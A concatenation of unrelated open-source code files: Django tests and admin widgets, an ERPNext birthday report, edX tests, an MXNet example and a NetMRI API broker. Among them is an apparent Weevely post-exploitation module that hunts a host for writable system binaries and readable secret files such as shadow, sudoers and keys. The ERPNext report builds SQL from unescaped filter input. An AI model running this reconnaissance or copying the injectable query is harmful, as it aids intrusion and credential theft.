"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
headline__startswith='Swallow',
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
pub_date__month=7,
)
class ConcurrentSaveTests(TransactionTestCase):
available_apps = ['basic']
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_concurrent_delete_with_save(self):
"""
Test fetching, deleting and finally saving an object - we should get
an insert in this case.
"""
a = Article.objects.create(headline='foo', pub_date=datetime.now())
exceptions = []
def deleter():
try:
# Do not delete a directly - doing so alters its state.
Article.objects.filter(pk=a.pk).delete()
except Exception as e:
exceptions.append(e)
finally:
connections[DEFAULT_DB_ALIAS].close()
self.assertEqual(len(exceptions), 0)
t = threading.Thread(target=deleter)
t.start()
t.join()
a.save()
self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(SimpleTestCase):
QUERYSET_PROXY_METHODS = [
'none',
'count',
'dates',
'datetimes',
'distinct',
'extra',
'get',
'get_or_create',
'update_or_create',
'create',
'bulk_create',
'filter',
'aggregate',
'annotate',
'complex_filter',
'exclude',
'in_bulk',
'iterator',
'earliest',
'latest',
'first',
'last',
'order_by',
'select_for_update',
'select_related',
'prefetch_related',
'values',
'values_list',
'update',
'reverse',
'defer',
'only',
'using',
'exists',
'_insert',
'_update',
'raw',
]
def test_manager_methods(self):
"""
This test ensures that the correct set of methods from `QuerySet`
are copied onto `Manager`.
It's particularly useful to prevent accidentally leaking new methods
into `Manager`. New `QuerySet` methods that should also be copied onto
`Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
"""
self.assertEqual(
sorted(BaseManager._get_queryset_methods(QuerySet).keys()),
sorted(self.QUERYSET_PROXY_METHODS),
)
class SelectOnSaveTests(TestCase):
def test_select_on_save(self):
a1 = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(1):
a1.save()
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(2):
asos.save()
with self.assertNumQueries(1):
asos.save(force_update=True)
Article.objects.all().delete()
with self.assertRaises(DatabaseError):
with self.assertNumQueries(1):
asos.save(force_update=True)
def test_select_on_save_lying_update(self):
"""
Test that select_on_save works correctly if the database
doesn't return correct information about matched rows from
UPDATE.
"""
# Change the manager to not return "row matched" for update().
# We are going to change the Article's _base_manager class
# dynamically. This is a bit of a hack, but it seems hard to
# test this properly otherwise. Article's manager, because
# proxy models use their parent model's _base_manager.
orig_class = Article._base_manager.__class__
class FakeQuerySet(QuerySet):
# Make sure the _update method below is in fact called.
called = False
def _update(self, *args, **kwargs):
FakeQuerySet.called = True
super(FakeQuerySet, self)._update(*args, **kwargs)
return 0
class FakeManager(orig_class):
def get_queryset(self):
return FakeQuerySet(self.model)
try:
Article._base_manager.__class__ = FakeManager
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(3):
asos.save()
self.assertTrue(FakeQuerySet.called)
# This is not wanted behavior, but this is how Django has always
# behaved for databases that do not return correct information
# about matched rows for UPDATE.
with self.assertRaises(DatabaseError):
asos.save(force_update=True)
with self.assertRaises(DatabaseError):
asos.save(update_fields=['pub_date'])
finally:
Article._base_manager.__class__ = orig_class
class ModelRefreshTests(TestCase):
def _truncate_ms(self, val):
# MySQL < 5.6.4 removes microseconds from the datetimes which can cause
# problems when comparing the original value to that loaded from DB
return val - timedelta(microseconds=val.microsecond)
def test_refresh(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.filter(pk=a.pk).update(headline='new headline')
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.headline, 'new headline')
orig_pub_date = a.pub_date
new_pub_date = a.pub_date + timedelta(10)
Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db(fields=['headline'])
self.assertEqual(a.headline, 'new headline 2')
self.assertEqual(a.pub_date, orig_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.pub_date, new_pub_date)
def test_refresh_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create()
s3 = SelfRef.objects.create(selfref=s1)
s3_copy = SelfRef.objects.get(pk=s3.pk)
s3_copy.selfref.touched = True
s3.selfref = s2
s3.save()
with self.assertNumQueries(1):
s3_copy.refresh_from_db()
with self.assertNumQueries(1):
# The old related instance was thrown away (the selfref_id has
# changed). It needs to be reloaded on access, so one query
# executed.
self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
self.assertEqual(s3_copy.selfref, s2)
def test_refresh_null_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create(selfref=s1)
s2.selfref = None
s2.refresh_from_db()
self.assertEqual(s2.selfref, s1)
def test_refresh_unsaved(self):
pub_date = self._truncate_ms(datetime.now())
a = Article.objects.create(pub_date=pub_date)
a2 = Article(id=a.pk)
with self.assertNumQueries(1):
a2.refresh_from_db()
self.assertEqual(a2.pub_date, pub_date)
self.assertEqual(a2._state.db, "default")
def test_refresh_no_fields(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
with self.assertNumQueries(0):
a.refresh_from_db(fields=[])
class TestRelatedObjectDeprecation(SimpleTestCase):
def test_field_related_deprecation(self):
field = SelfRef._meta.get_field('selfref')
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
self.assertIsInstance(field.related, ForeignObjectRel)
self.assertEqual(len(warns), 1)
self.assertEqual(
str(warns.pop().message),
'Usage of field.related has been deprecated. Use field.remote_field instead.'
) | unknown | codeparrot/codeparrot-clean | ||
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import flt
def execute(filters=None):
if not filters: filters = {}
columns = get_columns()
data = get_employees(filters)
return columns, data
def get_columns():
return [
"Employee:Link/Employee:120", "Date of Birth:Date:100", "Branch:Link/Branch:120",
"Department:Link/Department:120", "Designation:Link/Designation:120", "Gender::60",
"Company:Link/Company:120"
]
def get_employees(filters):
conditions = get_conditions(filters)
return frappe.db.sql("""select name, date_of_birth, branch, department, designation,
gender, company from tabEmployee where status = 'Active' %s""" % conditions, as_list=1)
def get_conditions(filters):
conditions = ""
if filters.get("month"):
month = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov",
"Dec"].index(filters["month"]) + 1
conditions += " and month(date_of_birth) = '%s'" % month
if filters.get("company"): conditions += " and company = '%s'" % \
filters["company"].replace("'", "\'")
return conditions | unknown | codeparrot/codeparrot-clean | ||
"""
Acceptance tests for Studio related to the acid xblock.
"""
from bok_choy.web_app_test import WebAppTest
from ...pages.studio.auto_auth import AutoAuthPage
from ...pages.studio.overview import CourseOutlinePage
from ...pages.xblock.acid import AcidView
from ...fixtures.course import CourseFixture, XBlockFixtureDesc
class XBlockAcidBase(WebAppTest):
"""
Base class for tests that verify that XBlock integration is working correctly
"""
__test__ = False
def setUp(self):
"""
Create a unique identifier for the course used in this test.
"""
# Ensure that the superclass sets up
super(XBlockAcidBase, self).setUp()
# Define a unique course identifier
self.course_info = {
'org': 'test_org',
'number': 'course_' + self.unique_id[:5],
'run': 'test_' + self.unique_id,
'display_name': 'Test Course ' + self.unique_id
}
self.outline = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_id = '{org}.{number}.{run}'.format(**self.course_info)
self.setup_fixtures()
self.auth_page = AutoAuthPage(
self.browser,
staff=False,
username=self.user.get('username'),
email=self.user.get('email'),
password=self.user.get('password')
)
self.auth_page.visit()
def validate_acid_block_preview(self, acid_block):
"""
Validate the Acid Block's preview
"""
self.assertTrue(acid_block.init_fn_passed)
self.assertTrue(acid_block.resource_url_passed)
self.assertTrue(acid_block.scope_passed('user_state'))
self.assertTrue(acid_block.scope_passed('user_state_summary'))
self.assertTrue(acid_block.scope_passed('preferences'))
self.assertTrue(acid_block.scope_passed('user_info'))
def test_acid_block_preview(self):
"""
Verify that all expected acid block tests pass in studio preview
"""
self.outline.visit()
subsection = self.outline.section('Test Section').subsection('Test Subsection')
unit = subsection.expand_subsection().unit('Test Unit').go_to()
acid_block = AcidView(self.browser, unit.xblocks[0].preview_selector)
self.validate_acid_block_preview(acid_block)
def test_acid_block_editor(self):
"""
Verify that all expected acid block tests pass in studio editor
"""
self.outline.visit()
subsection = self.outline.section('Test Section').subsection('Test Subsection')
unit = subsection.expand_subsection().unit('Test Unit').go_to()
acid_block = AcidView(self.browser, unit.xblocks[0].edit().editor_selector)
self.assertTrue(acid_block.init_fn_passed)
self.assertTrue(acid_block.resource_url_passed)
class XBlockAcidNoChildTest(XBlockAcidBase):
"""
Tests of an AcidBlock with no children
"""
__test__ = True
def setup_fixtures(self):
course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc('acid', 'Acid Block')
)
)
)
).install()
self.user = course_fix.user
class XBlockAcidParentBase(XBlockAcidBase):
"""
Base class for tests that verify that parent XBlock integration is working correctly
"""
__test__ = False
def validate_acid_block_preview(self, acid_block):
super(XBlockAcidParentBase, self).validate_acid_block_preview(acid_block)
self.assertTrue(acid_block.child_tests_passed)
def test_acid_block_preview(self):
"""
Verify that all expected acid block tests pass in studio preview
"""
self.outline.visit()
subsection = self.outline.section('Test Section').subsection('Test Subsection')
unit = subsection.expand_subsection().unit('Test Unit').go_to()
container = unit.xblocks[0].go_to_container()
acid_block = AcidView(self.browser, container.xblocks[0].preview_selector)
self.validate_acid_block_preview(acid_block)
class XBlockAcidEmptyParentTest(XBlockAcidParentBase):
"""
Tests of an AcidBlock with children
"""
__test__ = True
def setup_fixtures(self):
course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc('acid_parent', 'Acid Parent Block').add_children(
)
)
)
)
).install()
self.user = course_fix.user
class XBlockAcidChildTest(XBlockAcidParentBase):
"""
Tests of an AcidBlock with children
"""
__test__ = True
def setup_fixtures(self):
course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc('acid_parent', 'Acid Parent Block').add_children(
XBlockFixtureDesc('acid', 'First Acid Child', metadata={'name': 'first'}),
XBlockFixtureDesc('acid', 'Second Acid Child', metadata={'name': 'second'}),
XBlockFixtureDesc('html', 'Html Child', data="<html>Contents</html>"),
)
)
)
)
).install()
self.user = course_fix.user
def test_acid_block_preview(self):
super(XBlockAcidChildTest, self).test_acid_block_preview()
def test_acid_block_editor(self):
super(XBlockAcidChildTest, self).test_acid_block_editor() | unknown | codeparrot/codeparrot-clean | ||
from core.vectors import PhpCode, ShellCmd, ModuleExec, Os
from core.module import Module
from core.loggers import log
from core import modules
import utils
class Filesystem(Module):
"""Audit system files for wrong permissions."""
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.check_functions = [ f for f in dir(self) if f.startswith('check_') ]
self.register_arguments([
{ 'name' : 'check', 'choices' : self.check_functions, 'nargs' : '?' }
])
def check_writable_binaries(self):
"""Search writable files in binary folders"""
results = []
for path in [ '/bin/', '/usr/bin/', '/usr/sbin',
'/sbin', '/usr/local/bin', '/usr/local/sbin',
'/lib/', '/usr/lib/',
'/usr/local/lib' ]:
result = ModuleExec("file_find",
[ '-writable', path ]).run()
if result and any(r for r in result if r):
results += result
return results
def check_writable_etc(self):
"""Search writable files in etc folder"""
result = ModuleExec("file_find",
[ '-writable', '/etc/' ]
).run()
if result and any(r for r in result if r):
return result
def check_writable_root(self):
"""Search writable files in / folder"""
result = ModuleExec("file_find",
[ '-no-recursion',
'-writable',
'/' ]
).run()
if result and any(r for r in result if r):
return result
def check_home_writable(self):
"""Search writable files in /home/ folder"""
result = ModuleExec("file_find",
[ '-no-recursion',
'-writable',
'/home/' ]
).run()
if result and any(r for r in result if r):
return result
def check_spool_crons(self):
"""Search writable files in /var/spool/cron/ folder"""
result = ModuleExec("file_find",
[ '-writable',
'/var/spool/cron/' ]
).run()
if result and any(r for r in result if r):
return result
def check_home_executable(self):
"""Search executable files in /home/ folder"""
result = ModuleExec("file_find",
[ '-no-recursion',
'-executable',
'/home/' ]
).run()
if result and any(r for r in result if r):
return result
def check_readable_etc(self):
"""Search certain readable files in etc folder"""
readable_files = ModuleExec("file_find",
[ '-readable', '/etc/' ]
).run()
files_paths = [ 'shadow', 'ap-secrets',
'mysql/debian.cnf', 'sa_key$', 'keys',
'\.gpg', 'sudoers' ]
return [ f for f in readable_files
if f and any(p for p in files_paths if p and p in f)]
def check_readable_logs(self):
"""Search certain readable log files"""
readable_files = ModuleExec("file_find",
[ '-readable', '/var/log/' ]
).run()
files_paths = [ 'lastlog', 'dpkg', 'Xorg', 'wtmp',
'pm', 'alternatives', 'udev', 'boot' ]
return [
f for f in readable_files
if f
and not f.endswith('gz')
and not f.endswith('old')
and any(p for p in files_paths if p and p in f)]
def run(self):
results = {}
for func_name in [
# Execute every function starting with check_*
fn for fn in self.check_functions
# if the user does not specify any name
if not self.args.get('check')
# of if specify the current function name
or self.args.get('check') == fn
]:
function = getattr(self, func_name)
log.warn(function.__doc__)
result = function()
if result:
log.info('\n'.join(result))
results.update({ func_name : result })
return results
def print_result(self, result):
pass | unknown | codeparrot/codeparrot-clean | ||
"""
Form Widget classes specific to the Django admin site.
"""
from __future__ import unicode_literals
import copy
from django import forms
from django.contrib.admin.templatetags.admin_static import static
from django.core.urlresolvers import reverse
from django.db.models.deletion import CASCADE
from django.forms.utils import flatatt
from django.forms.widgets import RadioFieldRenderer
from django.template.loader import render_to_string
from django.utils import six
from django.utils.encoding import force_text
from django.utils.html import (
escape, escapejs, format_html, format_html_join, smart_urlquote,
)
from django.utils.safestring import mark_safe
from django.utils.text import Truncator
from django.utils.translation import ugettext as _
class FilteredSelectMultiple(forms.SelectMultiple):
"""
A SelectMultiple with a JavaScript filter interface.
Note that the resulting JavaScript assumes that the jsi18n
catalog has been loaded in the page
"""
@property
def media(self):
js = ["core.js", "SelectBox.js", "SelectFilter2.js"]
return forms.Media(js=[static("admin/js/%s" % path) for path in js])
def __init__(self, verbose_name, is_stacked, attrs=None, choices=()):
self.verbose_name = verbose_name
self.is_stacked = is_stacked
super(FilteredSelectMultiple, self).__init__(attrs, choices)
def render(self, name, value, attrs=None, choices=()):
if attrs is None:
attrs = {}
attrs['class'] = 'selectfilter'
if self.is_stacked:
attrs['class'] += 'stacked'
output = [super(FilteredSelectMultiple, self).render(name, value, attrs, choices)]
output.append('<script type="text/javascript">addEvent(window, "load", function(e) {')
# TODO: "id_" is hard-coded here. This should instead use the correct
# API to determine the ID dynamically.
output.append('SelectFilter.init("id_%s", "%s", %s); });</script>\n'
% (name, escapejs(self.verbose_name), int(self.is_stacked)))
return mark_safe(''.join(output))
class AdminDateWidget(forms.DateInput):
@property
def media(self):
js = ["calendar.js", "admin/DateTimeShortcuts.js"]
return forms.Media(js=[static("admin/js/%s" % path) for path in js])
def __init__(self, attrs=None, format=None):
final_attrs = {'class': 'vDateField', 'size': '10'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminDateWidget, self).__init__(attrs=final_attrs, format=format)
class AdminTimeWidget(forms.TimeInput):
@property
def media(self):
js = ["calendar.js", "admin/DateTimeShortcuts.js"]
return forms.Media(js=[static("admin/js/%s" % path) for path in js])
def __init__(self, attrs=None, format=None):
final_attrs = {'class': 'vTimeField', 'size': '8'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminTimeWidget, self).__init__(attrs=final_attrs, format=format)
class AdminSplitDateTime(forms.SplitDateTimeWidget):
"""
A SplitDateTime Widget that has some admin-specific styling.
"""
def __init__(self, attrs=None):
widgets = [AdminDateWidget, AdminTimeWidget]
# Note that we're calling MultiWidget, not SplitDateTimeWidget, because
# we want to define widgets.
forms.MultiWidget.__init__(self, widgets, attrs)
def format_output(self, rendered_widgets):
return format_html('<p class="datetime">{} {}<br />{} {}</p>',
_('Date:'), rendered_widgets[0],
_('Time:'), rendered_widgets[1])
class AdminRadioFieldRenderer(RadioFieldRenderer):
def render(self):
"""Outputs a <ul> for this set of radio fields."""
return format_html('<ul{}>\n{}\n</ul>',
flatatt(self.attrs),
format_html_join('\n', '<li>{}</li>',
((force_text(w),) for w in self)))
class AdminRadioSelect(forms.RadioSelect):
renderer = AdminRadioFieldRenderer
class AdminFileWidget(forms.ClearableFileInput):
template_with_initial = ('<p class="file-upload">%s</p>'
% forms.ClearableFileInput.template_with_initial)
template_with_clear = ('<span class="clearable-file-input">%s</span>'
% forms.ClearableFileInput.template_with_clear)
def url_params_from_lookup_dict(lookups):
"""
Converts the type of lookups specified in a ForeignKey limit_choices_to
attribute to a dictionary of query parameters
"""
params = {}
if lookups and hasattr(lookups, 'items'):
items = []
for k, v in lookups.items():
if callable(v):
v = v()
if isinstance(v, (tuple, list)):
v = ','.join(str(x) for x in v)
elif isinstance(v, bool):
# See django.db.fields.BooleanField.get_prep_lookup
v = ('0', '1')[v]
else:
v = six.text_type(v)
items.append((k, v))
params.update(dict(items))
return params
class ForeignKeyRawIdWidget(forms.TextInput):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface rather than
in a <select> box.
"""
def __init__(self, rel, admin_site, attrs=None, using=None):
self.rel = rel
self.admin_site = admin_site
self.db = using
super(ForeignKeyRawIdWidget, self).__init__(attrs)
def render(self, name, value, attrs=None):
rel_to = self.rel.model
if attrs is None:
attrs = {}
extra = []
if rel_to in self.admin_site._registry:
# The related object is registered with the same AdminSite
related_url = reverse(
'admin:%s_%s_changelist' % (
rel_to._meta.app_label,
rel_to._meta.model_name,
),
current_app=self.admin_site.name,
)
params = self.url_parameters()
if params:
url = '?' + '&'.join('%s=%s' % (k, v) for k, v in params.items())
else:
url = ''
if "class" not in attrs:
attrs['class'] = 'vForeignKeyRawIdAdminField' # The JavaScript code looks for this hook.
# TODO: "lookup_id_" is hard-coded here. This should instead use
# the correct API to determine the ID dynamically.
extra.append('<a href="%s%s" class="related-lookup" id="lookup_id_%s" title="%s"></a>' %
(related_url, url, name, _('Lookup')))
output = [super(ForeignKeyRawIdWidget, self).render(name, value, attrs)] + extra
if value:
output.append(self.label_for_value(value))
return mark_safe(''.join(output))
def base_url_parameters(self):
limit_choices_to = self.rel.limit_choices_to
if callable(limit_choices_to):
limit_choices_to = limit_choices_to()
return url_params_from_lookup_dict(limit_choices_to)
def url_parameters(self):
from django.contrib.admin.views.main import TO_FIELD_VAR
params = self.base_url_parameters()
params.update({TO_FIELD_VAR: self.rel.get_related_field().name})
return params
def label_for_value(self, value):
key = self.rel.get_related_field().name
try:
obj = self.rel.model._default_manager.using(self.db).get(**{key: value})
return ' <strong>%s</strong>' % escape(Truncator(obj).words(14, truncate='...'))
except (ValueError, self.rel.model.DoesNotExist):
return ''
class ManyToManyRawIdWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ManyToMany ids in the "raw_id" interface rather than
in a <select multiple> box.
"""
def render(self, name, value, attrs=None):
if attrs is None:
attrs = {}
if self.rel.model in self.admin_site._registry:
# The related object is registered with the same AdminSite
attrs['class'] = 'vManyToManyRawIdAdminField'
if value:
value = ','.join(force_text(v) for v in value)
else:
value = ''
return super(ManyToManyRawIdWidget, self).render(name, value, attrs)
def url_parameters(self):
return self.base_url_parameters()
def label_for_value(self, value):
return ''
def value_from_datadict(self, data, files, name):
value = data.get(name)
if value:
return value.split(',')
class RelatedFieldWidgetWrapper(forms.Widget):
"""
This class is a wrapper to a given widget to add the add icon for the
admin interface.
"""
template = 'admin/related_widget_wrapper.html'
def __init__(self, widget, rel, admin_site, can_add_related=None,
can_change_related=False, can_delete_related=False):
self.needs_multipart_form = widget.needs_multipart_form
self.attrs = widget.attrs
self.choices = widget.choices
self.widget = widget
self.rel = rel
# Backwards compatible check for whether a user can add related
# objects.
if can_add_related is None:
can_add_related = rel.model in admin_site._registry
self.can_add_related = can_add_related
# XXX: The UX does not support multiple selected values.
multiple = getattr(widget, 'allow_multiple_selected', False)
self.can_change_related = not multiple and can_change_related
# XXX: The deletion UX can be confusing when dealing with cascading deletion.
cascade = getattr(rel, 'on_delete', None) is CASCADE
self.can_delete_related = not multiple and not cascade and can_delete_related
# so we can check if the related object is registered with this AdminSite
self.admin_site = admin_site
def __deepcopy__(self, memo):
obj = copy.copy(self)
obj.widget = copy.deepcopy(self.widget, memo)
obj.attrs = self.widget.attrs
memo[id(self)] = obj
return obj
@property
def is_hidden(self):
return self.widget.is_hidden
@property
def media(self):
return self.widget.media
def get_related_url(self, info, action, *args):
return reverse("admin:%s_%s_%s" % (info + (action,)),
current_app=self.admin_site.name, args=args)
def render(self, name, value, *args, **kwargs):
from django.contrib.admin.views.main import IS_POPUP_VAR, TO_FIELD_VAR
rel_opts = self.rel.model._meta
info = (rel_opts.app_label, rel_opts.model_name)
self.widget.choices = self.choices
url_params = '&'.join("%s=%s" % param for param in [
(TO_FIELD_VAR, self.rel.get_related_field().name),
(IS_POPUP_VAR, 1),
])
context = {
'widget': self.widget.render(name, value, *args, **kwargs),
'name': name,
'url_params': url_params,
'model': rel_opts.verbose_name,
}
if self.can_change_related:
change_related_template_url = self.get_related_url(info, 'change', '__fk__')
context.update(
can_change_related=True,
change_related_template_url=change_related_template_url,
)
if self.can_add_related:
add_related_url = self.get_related_url(info, 'add')
context.update(
can_add_related=True,
add_related_url=add_related_url,
)
if self.can_delete_related:
delete_related_template_url = self.get_related_url(info, 'delete', '__fk__')
context.update(
can_delete_related=True,
delete_related_template_url=delete_related_template_url,
)
return mark_safe(render_to_string(self.template, context))
def build_attrs(self, extra_attrs=None, **kwargs):
"Helper function for building an attribute dictionary."
self.attrs = self.widget.build_attrs(extra_attrs=None, **kwargs)
return self.attrs
def value_from_datadict(self, data, files, name):
return self.widget.value_from_datadict(data, files, name)
def id_for_label(self, id_):
return self.widget.id_for_label(id_)
class AdminTextareaWidget(forms.Textarea):
def __init__(self, attrs=None):
final_attrs = {'class': 'vLargeTextField'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminTextareaWidget, self).__init__(attrs=final_attrs)
class AdminTextInputWidget(forms.TextInput):
def __init__(self, attrs=None):
final_attrs = {'class': 'vTextField'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminTextInputWidget, self).__init__(attrs=final_attrs)
class AdminEmailInputWidget(forms.EmailInput):
def __init__(self, attrs=None):
final_attrs = {'class': 'vTextField'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminEmailInputWidget, self).__init__(attrs=final_attrs)
class AdminURLFieldWidget(forms.URLInput):
def __init__(self, attrs=None):
final_attrs = {'class': 'vURLField'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminURLFieldWidget, self).__init__(attrs=final_attrs)
def render(self, name, value, attrs=None):
html = super(AdminURLFieldWidget, self).render(name, value, attrs)
if value:
value = force_text(self._format_value(value))
final_attrs = {'href': smart_urlquote(value)}
html = format_html(
'<p class="url">{} <a{}>{}</a><br />{} {}</p>',
_('Currently:'), flatatt(final_attrs), value,
_('Change:'), html
)
return html
class AdminIntegerFieldWidget(forms.TextInput):
class_name = 'vIntegerField'
def __init__(self, attrs=None):
final_attrs = {'class': self.class_name}
if attrs is not None:
final_attrs.update(attrs)
super(AdminIntegerFieldWidget, self).__init__(attrs=final_attrs)
class AdminBigIntegerFieldWidget(AdminIntegerFieldWidget):
class_name = 'vBigIntegerField'
class AdminCommaSeparatedIntegerFieldWidget(forms.TextInput):
def __init__(self, attrs=None):
final_attrs = {'class': 'vCommaSeparatedIntegerField'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminCommaSeparatedIntegerFieldWidget, self).__init__(attrs=final_attrs) | unknown | codeparrot/codeparrot-clean | ||
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from data import mnist_iterator
import mxnet as mx
import numpy as np
import logging
class NumpySoftmax(mx.operator.NumpyOp):
def __init__(self):
super(NumpySoftmax, self).__init__(False)
def list_arguments(self):
return ['data', 'label']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
data_shape = in_shape[0]
label_shape = (in_shape[0][0],)
output_shape = in_shape[0]
return [data_shape, label_shape], [output_shape]
def forward(self, in_data, out_data):
x = in_data[0]
y = out_data[0]
y[:] = np.exp(x - x.max(axis=1).reshape((x.shape[0], 1)))
y /= y.sum(axis=1).reshape((x.shape[0], 1))
def backward(self, out_grad, in_data, out_data, in_grad):
l = in_data[1]
l = l.reshape((l.size,)).astype(np.int)
y = out_data[0]
dx = in_grad[0]
dx[:] = y
dx[np.arange(l.shape[0]), l] -= 1.0
# define mlp
data = mx.symbol.Variable('data')
fc1 = mx.symbol.FullyConnected(data = data, name='fc1', num_hidden=128)
act1 = mx.symbol.Activation(data = fc1, name='relu1', act_type="relu")
fc2 = mx.symbol.FullyConnected(data = act1, name = 'fc2', num_hidden = 64)
act2 = mx.symbol.Activation(data = fc2, name='relu2', act_type="relu")
fc3 = mx.symbol.FullyConnected(data = act2, name='fc3', num_hidden=10)
#mlp = mx.symbol.Softmax(data = fc3, name = 'mlp')
mysoftmax = NumpySoftmax()
mlp = mysoftmax(data=fc3, name = 'softmax')
# data
train, val = mnist_iterator(batch_size=100, input_shape = (784,))
# train
logging.basicConfig(level=logging.DEBUG)
model = mx.model.FeedForward(
ctx = mx.cpu(), symbol = mlp, num_epoch = 20,
learning_rate = 0.1, momentum = 0.9, wd = 0.00001)
model.fit(X=train, eval_data=val) | unknown | codeparrot/codeparrot-clean | ||
from ..broker import Broker
class ModelDocBroker(Broker):
controller = "model_docs"
def show(self, **kwargs):
"""Shows the details for the specified model doc.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The internal NetMRI identifier for this model.
:type id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model_doc: The model doc identified by the specified id.
:rtype model_doc: ModelDoc
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available model docs. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this model.
:type id: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this model.
:type id: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each ModelDoc. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model_docs: An array of the ModelDoc objects that match the specified input criteria.
:rtype model_docs: Array of ModelDoc
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
